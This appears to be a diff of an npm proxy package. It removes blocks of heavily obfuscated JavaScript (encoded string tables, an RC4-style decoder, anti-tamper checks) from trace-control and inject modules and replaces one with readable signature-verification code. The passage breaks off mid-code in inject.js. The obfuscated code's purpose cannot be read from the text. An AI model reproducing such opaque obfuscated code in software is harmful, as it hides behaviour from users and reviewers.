_0x183a6a=-0x1*-0x112b+-0x5c6+-0xb65*0x1,_0x353eb3,_0x1b7eb6,_0x9634b5=0x32*0x67+0x1ae5+0x91*-0x53;_0x1b7eb6=_0x54de54['\x63\x68\x61\x72\x41\x74'](_0x9634b5++);~_0x1b7eb6&&(_0x353eb3=_0x183a6a%(0x493*-0x1+-0x1*-0x1f16+-0x1a7f)?_0x353eb3*(0x15c9+0x532*0x7+0x9*-0x66f)+_0x1b7eb6:_0x1b7eb6,_0x183a6a++%(0x20cb+-0x1*-0x11a1+-0x3268))?_0x1aa032+=_0x408153||_0xaaa5dc['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x9634b5+(0x24fa+0x12a8+0x944*-0x6))-(-0x2*0x1319+-0xd79+0x7*0x763)!==-0x18*0x15a+-0x23ce+0x443e?String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](-0xf3*0x1+0x23a9+-0x1*0x21b7&_0x353eb3>>(-(0x43*0x53+-0x1*-0xdb9+0x17a*-0x18)*_0x183a6a&0x4ef*0x1+-0x553+0x6a)):_0x183a6a:-0x2*-0x50d+0x6*-0x1f2+0x192){_0x1b7eb6=_0x161189['\x69\x6e\x64\x65\x78\x4f\x66'](_0x1b7eb6);}for(let _0x419cb6=0x25dc+0xc*0x2ed+0x4*-0x123e,_0x11d295=_0x1aa032['\x6c\x65\x6e\x67\x74\x68'];_0x419cb6<_0x11d295;_0x419cb6++){_0x4f49c9+='\x25'+('\x30\x30'+_0x1aa032['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x419cb6)['\x74\x6f\x53\x74\x72\x69\x6e\x67'](-0x992+0xa25+-0x83))['\x73\x6c\x69\x63\x65'](-(0x2d*0xdd+0x24fd+-0x4bd4));}return decodeURIComponent(_0x4f49c9);};const _0x4f895e=function(_0x2f8f0b,_0x481cdc){let _0x22ae38=[],_0x5a945c=-0x1729+-0xd2d+-0x1*-0x2456,_0x5b4c25,_0x11057c='';_0x2f8f0b=_0x4d2949(_0x2f8f0b);let _0x43b732;for(_0x43b732=-0x1e16*-0x1+0x5*-0x196+0x1628*-0x1;_0x43b732<-0x22c5+-0xe7a+0x323f;_0x43b732++){_0x22ae38[_0x43b732]=_0x43b732;}for(_0x43b732=-0xac5*0x1+-0x1f6f+0x2a34;_0x43b732<0x85*0x26+0xdb8+-0xad2*0x3;_0x43b732++){_0x5a945c=(_0x5a945c+_0x22ae38[_0x43b732]+_0x481cdc['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x43b732%_0x481cdc['\x6c\x65\x6e\x67\x74\x68']))%(-0x1ac0+-0x6fb+-0x1*-0x22bb),_0x5b4c25=_0x22ae38[_0x43b732],_0x22ae38[_0x43b732]=_0x22ae38[_0x5a945c],_0x22ae38[_0x5a945c]=_0x5b4c25;}_0x43b732=-0x2*0xe34+0x11cf*-0x2+-0x5d2*-0xb,_0x5a945c=-0x2527*-0x1+0xb*-0x259+-0x244*0x5;for(let _0x3a5f41=0x597+0x627*0x1+-0xbbe;_0x3a5f41<_0x2f8f0b['\x6c\x65\x6e\x67\x74\x68'];_0x3a5f41++){_0x43b732=(_0x43b732+(0xee4+0x7f9+-0x16dc))%(-0x142e+0x1e9+0x1345),_0x5a945c=(_0x5a945c+_0x22ae38[_0x43b732])%(-0x1132+-0x11e2+0x1*0x2414),_0x5b4c25=_0x22ae38[_0x43b732],_0x22ae38[_0x43b732]=_0x22ae38[_0x5a945c],_0x22ae38[_0x5a945c]=_0x5b4c25,_0x11057c+=String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](_0x2f8f0b['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x3a5f41)^_0x22ae38[(_0x22ae38[_0x43b732]+_0x22ae38[_0x5a945c])%(0x16*-0x143+0x12dc*-0x2+-0x7f*-0x86)]);}return _0x11057c;};_0x23c3['\x6a\x75\x74\x55\x62\x64']=_0x4f895e,_0x23c3['\x61\x51\x4c\x59\x56\x41']={},_0x23c3['\x4c\x58\x70\x47\x69\x71']=!![];}const _0x105fb7=_0x48a266[-0x79*0x3b+-0x83f+0x2422],_0x190e66=_0x5c2516+_0x105fb7,_0x2d27e3=_0x23c3['\x61\x51\x4c\x59\x56\x41'][_0x190e66];if(!_0x2d27e3){if(_0x23c3['\x64\x6e\x56\x78\x72\x77']===undefined){const _0x5252b8=function(_0xc77b53){this['\x66\x71\x4b\x4b\x68\x4f']=_0xc77b53,this['\x7a\x73\x53\x74\x6e\x53']=[-0x2343+-0x15e2*0x1+0x3926,-0x26e2+0x1202+0x10*0x14e,0x20*0xa0+0x1*0x50d+-0x190d],this['\x45\x6a\x6f\x48\x6d\x76']=function(){return'\x6e\x65\x77\x53\x74\x61\x74\x65';},this['\x41\x4d\x57\x54\x49\x64']='\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a',this['\x6b\x51\x79\x56\x43\x55']='\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d';};_0x5252b8['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x5a\x79\x47\x43\x72\x64']=function(){const _0x2f6077=new RegExp(this['\x41\x4d\x57\x54\x49\x64']+this['\x6b\x51\x79\x56\x43\x55']),_0x46777d=_0x2f6077['\x74\x65\x73\x74'](this['\x45\x6a\x6f\x48\x6d\x76']['\x74\x6f\x53\x74\x72\x69\x6e\x67']())?--this['\x7a\x73\x53\x74\x6e\x53'][0x2023+0xc32+0x2*-0x162a]:--this['\x7a\x73\x53\x74\x6e\x53'][0x1190+0x3*0xc29+-0x360b];return this['\x73\x4b\x61\x46\x59\x6c'](_0x46777d);},_0x5252b8['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x73\x4b\x61\x46\x59\x6c']=function(_0xf68bab){if(!Boolean(~_0xf68bab))return _0xf68bab;return this['\x4e\x43\x5a\x47\x73\x53'](this['\x66\x71\x4b\x4b\x68\x4f']);},_0x5252b8['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x4e\x43\x5a\x47\x73\x53']=function(_0x2853ab){for(let _0x3111b3=0x265b+0x1a*-0xcb+-0x11bd*0x1,_0x391d9c=this['\x7a\x73\x53\x74\x6e\x53']['\x6c\x65\x6e\x67\x74\x68'];_0x3111b3<_0x391d9c;_0x3111b3++){this['\x7a\x73\x53\x74\x6e\x53']['\x70\x75\x73\x68'](Math['\x72\x6f\x75\x6e\x64'](Math['\x72\x61\x6e\x64\x6f\x6d']())),_0x391d9c=this['\x7a\x73\x53\x74\x6e\x53']['\x6c\x65\x6e\x67\x74\x68'];}return _0x2853ab(this['\x7a\x73\x53\x74\x6e\x53'][0x22a6+0x21bb+-0x1*0x4461]);},(''+function(){return-0x1*0x1d27+0x215e+-0x437;})['\x69\x6e\x64\x65\x78\x4f\x66']('\x0a')===-(0x2*0xba9+-0x266b+0x1*0xf1a)&&new _0x5252b8(_0x23c3)['\x5a\x79\x47\x43\x72\x64'](),_0x23c3['\x64\x6e\x56\x78\x72\x77']=!![];}_0x5ec3eb=_0x23c3['\x6a\x75\x74\x55\x62\x64'](_0x5ec3eb,_0x405656),_0x23c3['\x61\x51\x4c\x59\x56\x41'][_0x190e66]=_0x5ec3eb;}else _0x5ec3eb=_0x2d27e3;return _0x5ec3eb;}_0xc18f10[_0x5e367f(0x23a,'\x73\x6c\x79\x54')+_0x5e367f(0x24c,'\x42\x65\x66\x42')]=_0x335831,_0xc18f10[_0x5e367f(0x262,'\x43\x58\x6d\x70')+_0x5e367f(0x1d2,'\x46\x64\x44\x26')+'\x6e\x66\x69\x67\x50\x61\x79\x6c'+_0x5e367f(0x1ec,'\x4c\x38\x58\x59')]=_0x407201,_0xc18f10[_0x5e367f(0x218,'\x74\x72\x4a\x65')+_0x5e367f(0x1e6,'\x43\x58\x6d\x70')+_0x5e367f(0x1ff,'\x4c\x38\x58\x59')+'\x72\x65']=_0x29a9d1,module[_0x5e367f(0x1e4,'\x45\x56\x78\x26')]=_0xc18f10;
|
|
1
|
+
'use strict';
|
|
2
|
+
|
|
3
|
+
const crypto = require('crypto');
|
|
4
|
+
|
|
5
|
+
function canonicalTraceConfigPayload(payload = {}) {
|
|
6
|
+
const clean = {};
|
|
7
|
+
for (const key of Object.keys(payload).sort()) {
|
|
8
|
+
if (key === 'signature' || key === 'trace_config_signature' || key === 'signature_algorithm') continue;
|
|
9
|
+
if (key === 'hub_public_key') continue;
|
|
10
|
+
const value = payload[key];
|
|
11
|
+
if (value !== undefined) clean[key] = value;
|
|
12
|
+
}
|
|
13
|
+
return JSON.stringify(clean);
|
|
14
|
+
}
|
|
15
|
+
|
|
16
|
+
function verifyTraceConfigSignature(payload = {}, env = process.env) {
|
|
17
|
+
const publicKey = String(
|
|
18
|
+
env.EVOMAP_TRACE_CONFIG_SIGNING_PUBLIC_KEY
|
|
19
|
+
|| env.EVOMAP_PROXY_TRACE_CONFIG_SIGNING_PUBLIC_KEY
|
|
20
|
+
|| ''
|
|
21
|
+
).trim();
|
|
22
|
+
const signature = String(payload.signature || payload.trace_config_signature || '').trim();
|
|
23
|
+
if (!publicKey || !signature) return false;
|
|
24
|
+
try {
|
|
25
|
+
return crypto.verify(
|
|
26
|
+
'sha256',
|
|
27
|
+
Buffer.from(canonicalTraceConfigPayload(payload), 'utf8'),
|
|
28
|
+
publicKey,
|
|
29
|
+
Buffer.from(signature, 'base64')
|
|
30
|
+
);
|
|
31
|
+
} catch {
|
|
32
|
+
return false;
|
|
33
|
+
}
|
|
34
|
+
}
|
|
35
|
+
|
|
36
|
+
class TraceControl {
|
|
37
|
+
constructor({ store, logger } = {}) {
|
|
38
|
+
this.store = store;
|
|
39
|
+
this.logger = logger || console;
|
|
40
|
+
}
|
|
41
|
+
|
|
42
|
+
process(message) {
|
|
43
|
+
const payload = message && message.payload ? message.payload : message;
|
|
44
|
+
const enabled = payload && (
|
|
45
|
+
payload.enabled ??
|
|
46
|
+
payload.trace_collection_enabled ??
|
|
47
|
+
payload.proxy_trace_collection_enabled
|
|
48
|
+
);
|
|
49
|
+
if (typeof enabled !== 'boolean') {
|
|
50
|
+
this.logger.warn?.('[trace-control] ignoring config without boolean enabled');
|
|
51
|
+
return { ack: true, applied: false };
|
|
52
|
+
}
|
|
53
|
+
let profileEnabled = payload.profile_analysis_enabled ?? payload.trace_profile_analysis_enabled;
|
|
54
|
+
const signed = verifyTraceConfigSignature(payload);
|
|
55
|
+
const unsafeEnable = enabled === true;
|
|
56
|
+
const unsafeProfile = profileEnabled === true;
|
|
57
|
+
const hasRuntimeHubKey = typeof payload.hub_public_key === 'string' && payload.hub_public_key.trim();
|
|
58
|
+
if (!signed && unsafeEnable) {
|
|
59
|
+
this.logger.warn?.('[trace-control] rejected unsigned trace config that could enable collection/profile analysis');
|
|
60
|
+
return { ack: true, applied: false };
|
|
61
|
+
}
|
|
62
|
+
if (!signed && unsafeProfile) {
|
|
63
|
+
this.logger.warn?.('[trace-control] ignored unsigned profile analysis enable while applying trace disable');
|
|
64
|
+
profileEnabled = false;
|
|
65
|
+
}
|
|
66
|
+
this.store.setState('trace_collection_enabled', enabled ? 'true' : 'false');
|
|
67
|
+
if (typeof profileEnabled === 'boolean') {
|
|
68
|
+
this.store.setState('trace_profile_analysis_enabled', profileEnabled ? 'true' : 'false');
|
|
69
|
+
}
|
|
70
|
+
if (hasRuntimeHubKey) {
|
|
71
|
+
this.logger.warn?.('[trace-control] ignored runtime hub_public_key; use pinned EVOMAP_PROXY_TRACE_HUB_PUBLIC_KEY');
|
|
72
|
+
}
|
|
73
|
+
this.store.setState('trace_collection_updated_at', new Date().toISOString());
|
|
74
|
+
this.logger.log?.('[trace-control] trace collection ' + (enabled ? 'enabled' : 'disabled'));
|
|
75
|
+
return { ack: true, applied: true };
|
|
76
|
+
}
|
|
77
|
+
|
|
78
|
+
pollAndApply() {
|
|
79
|
+
const messages = [
|
|
80
|
+
...this.store.poll({ type: 'trace_collection_config', limit: 50 }),
|
|
81
|
+
...this.store.poll({ type: 'proxy_trace_config', limit: 50 }),
|
|
82
|
+
];
|
|
83
|
+
let applied = 0;
|
|
84
|
+
for (const msg of messages) {
|
|
85
|
+
const result = this.process(msg);
|
|
86
|
+
const ack = result === true || (result && result.ack === true);
|
|
87
|
+
const didApply = result === true || (result && result.applied === true);
|
|
88
|
+
if (ack) {
|
|
89
|
+
this.store.ack(msg.id);
|
|
90
|
+
}
|
|
91
|
+
if (didApply) {
|
|
92
|
+
applied++;
|
|
93
|
+
}
|
|
94
|
+
}
|
|
95
|
+
return applied;
|
|
96
|
+
}
|
|
97
|
+
}
|
|
98
|
+
|
|
99
|
+
module.exports = { TraceControl, canonicalTraceConfigPayload, verifyTraceConfigSignature };
|
package/src/proxy/index.js
CHANGED
|
@@ -64,7 +64,15 @@ function planAssetSearch(body = {}) {
|
|
|
64
64
|
|
|
65
65
|
class EvoMapProxy {
|
|
66
66
|
constructor(opts = {}) {
|
|
67
|
-
|
|
67
|
+
// evolver#567: default to the canonical Hub URL (config.resolveHubUrl →
|
|
68
|
+
// https://evomap.ai, honouring the A2A_HUB_URL / EVOMAP_HUB_URL /
|
|
69
|
+
// EVOLVER_DEFAULT_HUB_URL precedence + https enforcement) instead of '',
|
|
70
|
+
// so a freshly-launched proxy is Hub-connected out of the box after
|
|
71
|
+
// `evolver login` rather than silently staying hub-less/offline (which
|
|
72
|
+
// surfaced as 503 "Hub not configured" and node_id: null over MCP).
|
|
73
|
+
// opts.hubUrl still overrides everything.
|
|
74
|
+
const { resolveHubUrl } = require('../config');
|
|
75
|
+
this.hubUrl = (opts.hubUrl || resolveHubUrl()).replace(/\/+$/, '');
|
|
68
76
|
this.dataDir = opts.dataDir || opts.dbPath || _defaultDataDir();
|
|
69
77
|
this.port = opts.port;
|
|
70
78
|
this.logger = opts.logger || console;
|
|
@@ -178,6 +186,7 @@ class EvoMapProxy {
|
|
|
178
186
|
},
|
|
179
187
|
logger: this.logger,
|
|
180
188
|
traceStore: this.store,
|
|
189
|
+
onTraceQueued: () => this.sync?.notifyNewOutbound(),
|
|
181
190
|
});
|
|
182
191
|
|
|
183
192
|
const routes = buildRoutes(this.store, proxyHandlers, this.taskMonitor, {
|
package/src/proxy/inject.js
CHANGED
|
@@ -1 +1,52 @@
|
|
|
1
|
-
const _0x582b27=_0x5515;function _0x3f94(){const _0x410860=['\x57\x36\x39\x63\x57\x34\x6c\x63\x4e\x53\x6b\x66\x6b\x53\x6f\x53\x57\x52\x30','\x68\x73\x57\x74\x73\x6d\x6f\x39\x57\x34\x52\x64\x4c\x67\x71','\x6c\x30\x33\x63\x52\x33\x6c\x63\x52\x43\x6b\x4e\x67\x5a\x6d\x6d\x57\x35\x74\x64\x55\x38\x6b\x6f\x65\x47','\x46\x47\x6c\x63\x4d\x57\x5a\x63\x52\x30\x7a\x4e\x57\x37\x76\x79\x57\x34\x6a\x54','\x70\x59\x64\x63\x47\x71','\x61\x32\x70\x64\x55\x47','\x71\x72\x44\x5a\x6f\x49\x57\x56','\x68\x4c\x37\x64\x54\x33\x42\x64\x48\x57','\x6c\x66\x6c\x63\x4f\x38\x6f\x70\x57\x35\x30\x44\x68\x66\x61','\x6f\x78\x6c\x63\x4c\x4b\x44\x74\x66\x77\x5a\x63\x55\x38\x6b\x6f','\x57\x36\x31\x67\x67\x38\x6f\x68\x7a\x71','\x74\x4a\x74\x64\x49\x61\x4a\x64\x4d\x53\x6f\x69','\x57\x50\x33\x63\x4d\x53\x6f\x52\x57\x51\x6d\x77\x57\x4f\x44\x48\x57\x36\x78\x63\x4c\x38\x6b\x46\x6a\x48\x43\x72','\x73\x38\x6f\x63\x77\x6d\x6f\x64\x71\x33\x4f\x74\x67\x61','\x64\x30\x64\x64\x4a\x76\x4f\x43\x57\x37\x4a\x64\x51\x53\x6b\x46','\x57\x36\x57\x58\x57\x51\x33\x64\x4a\x38\x6b\x36','\x44\x68\x61\x58\x57\x37\x38\x32','\x7a\x43\x6b\x62\x6e\x32\x52\x63\x4a\x53\x6b\x53\x6c\x6d\x6b\x73','\x45\x47\x46\x64\x51\x43\x6b\x58\x64\x57','\x74\x4d\x30\x64\x43\x53\x6f\x42','\x64\x72\x2f\x63\x54\x30\x42\x64\x4c\x61','\x57\x37\x56\x63\x54\x71\x66\x34\x74\x57','\x43\x43\x6f\x51\x57\x50\x76\x66','\x57\x37\x4a\x64\x53\x4c\x7a\x32\x57\x37\x38\x6f\x57\x52\x74\x64\x51\x61','\x65\x53\x6b\x34\x6a\x6d\x6f\x52\x6b\x48\x44\x35\x57\x51\x57','\x6c\x53\x6f\x51\x45\x43\x6f\x52\x57\x36\x47','\x61\x72\x4e\x63\x4b\x67\x37\x63\x53\x71','\x65\x31\x37\x64\x4d\x4b\x38\x68\x57\x36\x6c\x64\x4f\x43\x6b\x66','\x74\x6d\x6b\x30\x68\x43\x6b\x77\x57\x4f\x4c\x42\x66\x4a\x64\x64\x54\x68\x56\x63\x54\x4e\x4c\x7a','\x42\x58\x4a\x64\x49\x53\x6b\x50\x62\x6d\x6f\x76\x62\x53\x6b\x6d','\x79\x6d\x6f\x78\x78\x53\x6b\x42\x73\x32\x71\x72\x57\x4f\x48\x6b\x57\x37\x56\x64\x4e\x38\x6f\x75\x57\x4f\x61','\x73\x43\x6b\x4d\x65\x66\x68\x63\x54\x43\x6b\x6e\x67\x38\x6b\x65','\x57\x51\x76\x73\x74\x4d\x43','\x57\x36\x70\x64\x4f\x43\x6b\x51\x57\x36\x35\x72','\x78\x6d\x6f\x42\x74\x38\x6f\x78\x78\x78\x38\x45\x66\x71','\x57\x51\x76\x73\x6b\x6d\x6f\x32\x57\x4f\x70\x64\x4f\x58\x48\x76','\x46\x64\x35\x4b\x6d\x74\x61','\x57\x52\x71\x4f\x57\x35\x74\x64\x4c\x4d\x30','\x75\x75\x34\x65\x42\x6d\x6f\x71\x57\x34\x65','\x57\x35\x4e\x63\x47\x43\x6b\x57\x66\x5a\x4e\x64\x49\x58\x64\x63\x54\x47','\x57\x51\x4f\x6e\x57\x36\x35\x4e\x6c\x47','\x76\x4b\x47\x59\x57\x36\x30\x57','\x57\x51\x4b\x72\x57\x35\x76\x5a\x6f\x76\x4f','\x57\x52\x4c\x70\x57\x51\x6a\x2b\x57\x35\x5a\x63\x4a\x6d\x6b\x4c\x57\x4f\x75','\x70\x38\x6b\x4a\x69\x6d\x6b\x37\x6e\x48\x39\x37\x70\x53\x6b\x39\x57\x35\x37\x63\x47\x31\x52\x64\x51\x57','\x57\x52\x6e\x6f\x69\x38\x6f\x77\x57\x50\x6c\x64\x50\x72\x4c\x46','\x64\x65\x54\x73\x57\x36\x72\x63','\x57\x37\x52\x64\x4e\x4b\x62\x66\x57\x36\x50\x45','\x57\x50\x72\x59\x68\x53\x6f\x43\x57\x51\x4a\x64\x4b\x64\x48\x49','\x70\x62\x42\x63\x54\x57','\x57\x50\x43\x32\x57\x34\x44\x72\x6a\x47','\x57\x52\x44\x41\x74\x33\x78\x64\x4d\x76\x56\x64\x4a\x38\x6f\x2f','\x57\x50\x70\x64\x50\x32\x47\x68\x75\x6d\x6f\x35\x63\x62\x4b\x73\x57\x52\x65','\x57\x36\x2f\x64\x53\x53\x6b\x44\x57\x34\x6e\x32\x57\x37\x4f\x6a\x57\x35\x79','\x6a\x72\x46\x64\x4c\x43\x6b\x4c\x69\x78\x66\x4c\x57\x34\x47','\x6c\x67\x7a\x6b','\x6e\x57\x4e\x63\x54\x65\x52\x63\x4b\x32\x53\x47','\x57\x34\x37\x64\x52\x38\x6b\x4c\x57\x35\x4c\x32\x6e\x53\x6b\x41\x66\x71','\x57\x52\x75\x38\x6b\x6d\x6f\x34\x57\x34\x6a\x54\x57\x51\x39\x62','\x57\x50\x6a\x39\x41\x66\x5a\x64\x51\x78\x4a\x64\x55\x53\x6f\x73','\x57\x35\x4f\x6c\x57\x37\x62\x32\x71\x61','\x57\x51\x5a\x63\x53\x62\x31\x59\x44\x71','\x71\x32\x30\x46\x76\x53\x6f\x51\x57\x36\x37\x64\x4d\x4e\x34','\x57\x52\x58\x55\x79\x53\x6f\x68\x78\x58\x34','\x57\x37\x52\x64\x53\x38\x6b\x68\x79\x38\x6f\x67\x57\x37\x74\x63\x4e\x38\x6b\x51','\x57\x52\x61\x77\x57\x37\x68\x64\x48\x75\x33\x64\x4a\x6d\x6b\x76\x71\x57','\x41\x48\x6c\x64\x4d\x59\x5a\x64\x51\x6d\x6f\x30\x78\x47\x65','\x41\x61\x42\x64\x4c\x53\x6b\x54\x69\x71','\x57\x36\x5a\x64\x52\x76\x76\x7a\x57\x36\x38','\x68\x74\x4a\x63\x4f\x76\x52\x64\x4d\x47','\x57\x50\x37\x63\x4e\x43\x6f\x54\x57\x51\x62\x70\x57\x37\x61\x49\x57\x34\x4a\x63\x56\x43\x6b\x47','\x7a\x43\x6f\x45\x57\x35\x30\x78\x64\x6d\x6b\x77\x70\x75\x4f','\x57\x36\x79\x4a\x57\x36\x58\x44\x74\x68\x4e\x63\x47\x67\x43','\x57\x34\x56\x64\x56\x67\x7a\x4d\x57\x34\x58\x39\x57\x37\x37\x63\x55\x57','\x66\x77\x42\x64\x51\x31\x74\x64\x4f\x71','\x62\x49\x68\x64\x4c\x38\x6b\x42\x62\x47','\x6c\x67\x7a\x52\x57\x35\x66\x6b\x57\x50\x64\x63\x4e\x43\x6f\x6e','\x57\x52\x6c\x64\x54\x53\x6f\x7a\x42\x65\x42\x63\x51\x4d\x74\x64\x49\x57','\x57\x35\x69\x7a\x61\x31\x70\x64\x51\x71','\x65\x43\x6b\x49\x57\x37\x71\x77\x6d\x57','\x57\x4f\x65\x56\x57\x36\x33\x64\x56\x68\x37\x64\x54\x43\x6b\x4b\x7a\x71','\x72\x33\x2f\x63\x52\x48\x5a\x63\x4c\x57','\x6f\x43\x6b\x75\x57\x35\x34\x45\x68\x38\x6b\x64\x70\x71','\x70\x77\x4a\x64\x51\x33\x30\x39\x57\x34\x4e\x64\x4d\x43\x6b\x70','\x57\x52\x33\x63\x4e\x48\x38\x46\x57\x52\x47\x7a\x57\x50\x68\x63\x54\x38\x6f\x4c\x57\x51\x43\x4d\x57\x51\x2f\x63\x56\x47','\x57\x52\x79\x43\x57\x34\x70\x64\x47\x4c\x64\x64\x49\x57','\x57\x4f\x48\x50\x64\x53\x6f\x78\x57\x52\x4a\x64\x47\x73\x72\x31','\x78\x67\x57\x46\x73\x38\x6f\x4a','\x42\x30\x47\x75\x43\x53\x6f\x79\x57\x35\x2f\x64\x50\x30\x69','\x57\x51\x44\x46\x6d\x43\x6f\x73\x57\x4f\x65','\x46\x53\x6f\x4d\x45\x6d\x6f\x32\x45\x33\x75\x2f\x70\x61','\x57\x37\x38\x38\x6b\x75\x37\x64\x52\x38\x6b\x52\x41\x57\x57','\x42\x77\x61\x47\x75\x61','\x57\x34\x61\x5a\x57\x34\x6e\x31\x57\x34\x42\x63\x52\x53\x6b\x49\x57\x51\x4c\x7a','\x6d\x66\x37\x63\x53\x53\x6f\x35','\x41\x61\x2f\x64\x4b\x5a\x46\x64\x50\x71','\x42\x62\x4a\x64\x50\x59\x2f\x64\x56\x53\x6f\x59\x73\x71','\x57\x4f\x44\x5a\x65\x53\x6f\x6e\x57\x51\x78\x64\x4e\x4a\x31\x2f','\x57\x36\x2f\x64\x55\x6d\x6b\x70\x57\x34\x6a\x54\x57\x37\x38\x6a\x57\x34\x6d','\x57\x34\x6a\x73\x76\x53\x6b\x65\x57\x34\x31\x36\x57\x51\x66\x74\x57\x50\x6e\x44','\x57\x36\x4a\x64\x56\x43\x6b\x33\x57\x37\x54\x6e','\x77\x6d\x6b\x45\x57\x4f\x64\x63\x49\x43\x6f\x46\x57\x35\x71\x30\x77\x61','\x41\x4b\x64\x64\x53\x58\x46\x63\x50\x65\x30\x45\x57\x52\x2f\x63\x49\x43\x6b\x58','\x46\x43\x6f\x62\x57\x50\x39\x65\x74\x53\x6f\x73\x6e\x30\x38\x78\x57\x50\x6c\x64\x54\x6d\x6b\x46','\x72\x53\x6b\x38\x64\x65\x56\x63\x51\x6d\x6b\x73\x61\x53\x6b\x6f','\x57\x4f\x48\x71\x57\x4f\x62\x72\x57\x35\x57','\x42\x4c\x71\x76\x42\x43\x6f\x69\x57\x50\x37\x63\x47\x58\x53','\x57\x4f\x4f\x55\x57\x34\x46\x64\x48\x53\x6b\x67\x57\x37\x70\x63\x56\x43\x6b\x55\x43\x66\x5a\x64\x4f\x5a\x35\x76','\x57\x4f\x66\x76\x75\x64\x42\x63\x4c\x6d\x6f\x46\x68\x47\x6c\x63\x53\x6d\x6f\x74\x57\x34\x50\x53\x57\x37\x38','\x57\x4f\x6e\x52\x63\x43\x6f\x69\x57\x52\x42\x64\x47\x74\x6a\x4d','\x66\x4c\x31\x57\x57\x37\x44\x33\x57\x51\x4e\x63\x55\x53\x6f\x50','\x57\x50\x6d\x6e\x63\x38\x6f\x74\x57\x36\x54\x43\x57\x4f\x4c\x58','\x57\x35\x42\x64\x4a\x31\x39\x55\x57\x36\x79','\x57\x51\x2f\x63\x4f\x76\x52\x63\x4b\x43\x6f\x47','\x42\x5a\x54\x57\x57\x35\x6a\x43\x57\x52\x5a\x63\x4e\x38\x6f\x43','\x57\x37\x78\x63\x49\x38\x6b\x4c\x65\x59\x6d','\x43\x33\x6d\x78\x57\x36\x69','\x57\x51\x6c\x63\x54\x4e\x70\x63\x55\x53\x6f\x64','\x77\x63\x4a\x64\x4d\x6d\x6b\x69\x69\x53\x6f\x30\x6e\x38\x6b\x2f','\x70\x4e\x42\x63\x4c\x64\x30\x30\x43\x78\x4e\x63\x50\x6d\x6b\x63\x75\x6d\x6f\x42\x57\x50\x53','\x57\x34\x4e\x64\x49\x32\x53','\x57\x36\x30\x62\x57\x51\x33\x64\x52\x71','\x57\x4f\x42\x63\x49\x33\x70\x63\x52\x61','\x57\x52\x42\x63\x4d\x62\x58\x4f\x57\x34\x76\x61\x57\x37\x42\x63\x4e\x38\x6f\x6a','\x57\x35\x4a\x64\x47\x53\x6b\x33\x57\x37\x6e\x6d','\x66\x38\x6b\x54\x57\x52\x42\x64\x55\x48\x4a\x64\x53\x57','\x57\x35\x66\x6b\x73\x53\x6b\x73','\x57\x50\x64\x63\x4d\x61\x66\x7a\x45\x43\x6f\x53\x61\x76\x69','\x57\x37\x70\x63\x53\x6d\x6b\x42\x6a\x57\x37\x64\x54\x59\x52\x63\x48\x47','\x57\x34\x4c\x78\x77\x43\x6b\x68\x57\x52\x62\x4a\x57\x50\x58\x6d\x57\x50\x6e\x30\x65\x47','\x57\x4f\x4c\x46\x73\x38\x6f\x44\x73\x61','\x57\x4f\x46\x63\x48\x6d\x6f\x33\x57\x52\x69','\x77\x78\x53\x36\x74\x43\x6f\x36\x57\x36\x43','\x62\x38\x6b\x6c\x57\x4f\x68\x64\x48\x58\x79','\x7a\x4d\x6d\x6a\x57\x35\x47\x78','\x57\x51\x6d\x39\x57\x35\x50\x6f\x6c\x47','\x6b\x4e\x42\x64\x51\x33\x58\x4b','\x57\x51\x4e\x63\x56\x5a\x72\x33\x78\x38\x6f\x62','\x57\x4f\x58\x45\x75\x6d\x6f\x48\x43\x5a\x56\x63\x4c\x43\x6f\x56','\x44\x5a\x4e\x64\x4b\x6d\x6b\x2f\x68\x47','\x6a\x68\x70\x64\x53\x77\x6d','\x57\x35\x6d\x36\x57\x50\x78\x64\x4b\x6d\x6b\x73','\x75\x33\x68\x63\x4a\x5a\x70\x63\x50\x61','\x6f\x38\x6b\x33\x6e\x43\x6b\x34\x6f\x61','\x70\x53\x6b\x46\x68\x38\x6f\x56\x66\x59\x71','\x57\x50\x61\x65\x57\x52\x75','\x6e\x75\x37\x63\x50\x53\x6f\x73\x57\x34\x43\x32\x70\x30\x43'];_0x3f94=function(){return _0x410860;};return _0x3f94();}function _0x5515(_0x4906de,_0x5e61c6){_0x4906de=_0x4906de-(0x6*0x2c8+0x1a24+0x292f*-0x1);const _0x3962a1=_0x3f94();let _0x5a6226=_0x3962a1[_0x4906de];if(_0x5515['\x4b\x56\x46\x4c\x79\x66']===undefined){var _0x3f7ccc=function(_0x4c2dbb){const _0x564ca7='\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2b\x2f\x3d';let _0x25a8da='',_0x42b0ae='',_0x206bb4=_0x25a8da+_0x3f7ccc,_0x277f23=(''+function(){return-0x87*-0x2d+-0x194a+0x18f;})['\x69\x6e\x64\x65\x78\x4f\x66']('\x0a')!==-(-0x256d+0x1*0x1cc7+0x5*0x1bb);for(let 